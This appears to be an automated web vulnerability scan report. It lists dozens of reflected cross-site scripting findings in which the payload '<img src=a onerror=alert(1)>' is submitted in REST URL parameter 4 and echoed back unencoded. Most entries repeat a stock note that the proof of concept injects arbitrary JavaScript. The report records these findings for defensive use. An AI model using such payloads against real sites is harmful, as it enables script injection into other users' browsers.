The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f was submitted in the REST URL parameter 4. This input was echoed as f4718<img src=a onerror=alert(1)>bea69b6fa7f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91 was submitted in the REST URL parameter 4. This input was echoed as bd500<img src=a onerror=alert(1)>63f1c2b1e91 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8 was submitted in the REST URL parameter 4. This input was echoed as c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a was submitted in the REST URL parameter 4. This input was echoed as a8212<img src=a onerror=alert(1)>0c3e014616a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74 was submitted in the REST URL parameter 4. This input was echoed as 29dbe<img src=a onerror=alert(1)>537d4a97d74 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2 was submitted in the REST URL parameter 4. This input was echoed as 9b4ba<img src=a onerror=alert(1)>151550698b2 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c was submitted in the REST URL parameter 4. This input was echoed as 3b1e3<img src=a onerror=alert(1)>4fa5924f20c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7 was submitted in the REST URL parameter 4. This input was echoed as c989f<img src=a onerror=alert(1)>b103b4531c7 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941 was submitted in the REST URL parameter 4. This input was echoed as 33297<img src=a onerror=alert(1)>decb9bf7941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba was submitted in the REST URL parameter 4. This input was echoed as 5bcee<img src=a onerror=alert(1)>c14eea029ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130 was submitted in the REST URL parameter 4. This input was echoed as 90828<img src=a onerror=alert(1)>fe6a2201130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb was submitted in the REST URL parameter 4. This input was echoed as e3b3c<img src=a onerror=alert(1)>13da9e9c6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2 was submitted in the REST URL parameter 4. This input was echoed as 8700b<img src=a onerror=alert(1)>bdffb2a02a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 64f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e was submitted in the REST URL parameter 4. This input was echoed as 64f02<img src=a onerror=alert(1)>b6c57a1461e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f was submitted in the REST URL parameter 4. This input was echoed as 2ee25<img src=a onerror=alert(1)>3b765dcf0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168 was submitted in the REST URL parameter 4. This input was echoed as 7774f<img src=a onerror=alert(1)>c982e7ff168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7 was submitted in the REST URL parameter 4. This input was echoed as a1360<img src=a onerror=alert(1)>b908ff5f0c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd was submitted in the REST URL parameter 4. This input was echoed as 2691d<img src=a onerror=alert(1)>ff0958088bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20 was submitted in the REST URL parameter 4. This input was echoed as 1cace<img src=a onerror=alert(1)>1bd330bfb20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00 was submitted in the REST URL parameter 4. This input was echoed as 15073<img src=a onerror=alert(1)>f2ab600da00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf was submitted in the REST URL parameter 4. This input was echoed as 2a01c<img src=a onerror=alert(1)>c59a7bb49cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9 was submitted in the REST URL parameter 4. This input was echoed as 30a03<img src=a onerror=alert(1)>b779fe1f7b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192 was submitted in the REST URL parameter 4. This input was echoed as d2df7<img src=a onerror=alert(1)>13cbaaf6192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16b4a<img%20src%3da%20onerror%3dalert(1)>08531805115 was submitted in the REST URL parameter 4. This input was echoed as 16b4a<img src=a onerror=alert(1)>08531805115 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88 was submitted in the REST URL parameter 4. This input was echoed as 1aa81<img src=a onerror=alert(1)>32a833d8e88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a was submitted in the REST URL parameter 4. This input was echoed as ae391<img src=a onerror=alert(1)>b5d850ecb0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4 was submitted in the REST URL parameter 4. This input was echoed as 3ad42<img src=a onerror=alert(1)>34c513cf0a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236 was submitted in the REST URL parameter 4. This input was echoed as ffe7a<img src=a onerror=alert(1)>61eb2ed236 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564 was submitted in the REST URL parameter 4. This input was echoed as a7c25<img src=a onerror=alert(1)>bf4a77e9564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe was submitted in the REST URL parameter 4. This input was echoed as bb82c<img src=a onerror=alert(1)>574c67e7dbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 27c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971 was submitted in the REST URL parameter 4. This input was echoed as 27c18<img src=a onerror=alert(1)>e49400a6971 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792 was submitted in the REST URL parameter 4. This input was echoed as 2eb8d<img src=a onerror=alert(1)>d5c30b3b792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d was submitted in the REST URL parameter 4. This input was echoed as c44d2<img src=a onerror=alert(1)>c9ec97fa83d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29 was submitted in the REST URL parameter 4. This input was echoed as b0452<img src=a onerror=alert(1)>04e3d076a29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071 was submitted in the REST URL parameter 4. This input was echoed as c8217<img src=a onerror=alert(1)>5ad7d86071 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8 was submitted in the REST URL parameter 4. This input was echoed as 79f41<img src=a onerror=alert(1)>5ccd163b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344 was submitted in the REST URL parameter 4. This input was echoed as 755eb<img src=a onerror=alert(1)>47067a17344 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60 was submitted in the REST URL parameter 4. This input was echoed as 1d143<img src=a onerror=alert(1)>936e8defb60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f was submitted in the REST URL parameter 4. This input was echoed as 69983<img src=a onerror=alert(1)>f35ffca885f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009 was submitted in the REST URL parameter 4. This input was echoed as 83df9<img src=a onerror=alert(1)>d9b39cf6009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5 was submitted in the REST URL parameter 4. This input was echoed as 9d13e<img src=a onerror=alert(1)>698417051a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776 was submitted in the REST URL parameter 4. This input was echoed as 99b97<img src=a onerror=alert(1)>a15cb515776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6863f<img%20src%3da%20onerror%3dalert(1)>762e2322661 was submitted in the REST URL parameter 4. This input was echoed as 6863f<img src=a onerror=alert(1)>762e2322661 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e was submitted in the REST URL parameter 4. This input was echoed as eac13<img src=a onerror=alert(1)>9cf9d655a9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c was submitted in the REST URL parameter 4. This input was echoed as 7801f<img src=a onerror=alert(1)>61f7452cf3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b was submitted in the REST URL parameter 4. This input was echoed as 947c7<img src=a onerror=alert(1)>1af0a08797b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1068d<img%20src%3da%20onerror%3dalert(1)>1d595725188 was submitted in the REST URL parameter 4. This input was echoed as 1068d<img src=a onerror=alert(1)>1d595725188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312 was submitted in the REST URL parameter 4. This input was echoed as 5e727<img src=a onerror=alert(1)>7a30eede312 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd was submitted in the REST URL parameter 4. This input was echoed as a9f36<img src=a onerror=alert(1)>5c1fecab3cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad was submitted in the REST URL parameter 4. This input was echoed as 7247c<img src=a onerror=alert(1)>ddc992b41ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1 was submitted in the REST URL parameter 4. This input was echoed as 90a9c<img src=a onerror=alert(1)>442113cd0c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a was submitted in the REST URL parameter 4. This input was echoed as fb28d<img src=a onerror=alert(1)>55aeca0da2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a was submitted in the REST URL parameter 4. This input was echoed as dcebf<img src=a onerror=alert(1)>21784df730a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58 was submitted in the REST URL parameter 4. This input was echoed as e8804<img src=a onerror=alert(1)>67595dbea58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79048<img%20src%3da%20onerror%3dalert(1)>749ccefca97 was submitted in the REST URL parameter 4. This input was echoed as 79048<img src=a onerror=alert(1)>749ccefca97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e was submitted in the REST URL parameter 4. This input was echoed as ecb0e<img src=a onerror=alert(1)>6e752a7b23e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae was submitted in the REST URL parameter 4. This input was echoed as f991d<img src=a onerror=alert(1)>ef4f0d284ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311 was submitted in the REST URL parameter 4. This input was echoed as cf79c<img src=a onerror=alert(1)>98a86016311 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d was submitted in the REST URL parameter 4. This input was echoed as bb496<img src=a onerror=alert(1)>b68810f499d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353 was submitted in the REST URL parameter 4. This input was echoed as ebf0a<img src=a onerror=alert(1)>215758b8353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c was submitted in the REST URL parameter 4. This input was echoed as 279ba<img src=a onerror=alert(1)>f05e9a6a80c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25 was submitted in the REST URL parameter 4. This input was echoed as bc6a6<img src=a onerror=alert(1)>4a4a7d81d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107 was submitted in the REST URL parameter 4. This input was echoed as bc3da<img src=a onerror=alert(1)>ab65d9a1107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d was submitted in the REST URL parameter 4. This input was echoed as 432c1<img src=a onerror=alert(1)>8ef55fb9c1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150 was submitted in the REST URL parameter 4. This input was echoed as 278a0<img src=a onerror=alert(1)>88b38d4e150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07 was submitted in the REST URL parameter 4. This input was echoed as 1ecaf<img src=a onerror=alert(1)>288b53e1a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3 was submitted in the REST URL parameter 4. This input was echoed as 905c2<img src=a onerror=alert(1)>a7b33374ab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b was submitted in the REST URL parameter 4. This input was echoed as d1f38<img src=a onerror=alert(1)>0d292e7660b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c was submitted in the REST URL parameter 4. This input was echoed as ca3ba<img src=a onerror=alert(1)>4586f56f06c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c was submitted in the REST URL parameter 4. This input was echoed as f5e01<img src=a onerror=alert(1)>1dcdc06a97c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 744d4<img%20src%3da%20onerror%3dalert(1)>006768113df was submitted in the REST URL parameter 4. This input was echoed as 744d4<img src=a onerror=alert(1)>006768113df in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f was submitted in the REST URL parameter 4. This input was echoed as a27e4<img src=a onerror=alert(1)>0524341e47f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1 was submitted in the REST URL parameter 4. This input was echoed as f5e6e<img src=a onerror=alert(1)>e76187f4ae1 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509 was submitted in the REST URL parameter 4. This input was echoed as edcd6<img src=a onerror=alert(1)>7a54908e509 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8 was submitted in the REST URL parameter 4. This input was echoed as 48ebc<img src=a onerror=alert(1)>5d2a27851a8 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f was submitted in the REST URL parameter 4. This input was echoed as 9fd08<img src=a onerror=alert(1)>c0013a8d41f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144 was submitted in the REST URL parameter 4. This input was echoed as 11c3f<img src=a onerror=alert(1)>5ce85863144 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6 was submitted in the REST URL parameter 4. This input was echoed as 2ea1b<img src=a onerror=alert(1)>d25a73a3da6 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe was submitted in the REST URL parameter 4. This input was echoed as e84a7<img src=a onerror=alert(1)>970d3c015fe in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a was submitted in the REST URL parameter 4. This input was echoed as ddf3c<img src=a onerror=alert(1)>5d5e2808b3a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f was submitted in the REST URL parameter 4. This input was echoed as 3e3d3<img src=a onerror=alert(1)>8202863975f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf was submitted in the REST URL parameter 4. This input was echoed as f8094<img src=a onerror=alert(1)>da63b1adfaf in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396 was submitted in the REST URL parameter 4. This input was echoed as d64c9<img src=a onerror=alert(1)>0d594fd3396 in the application's response.
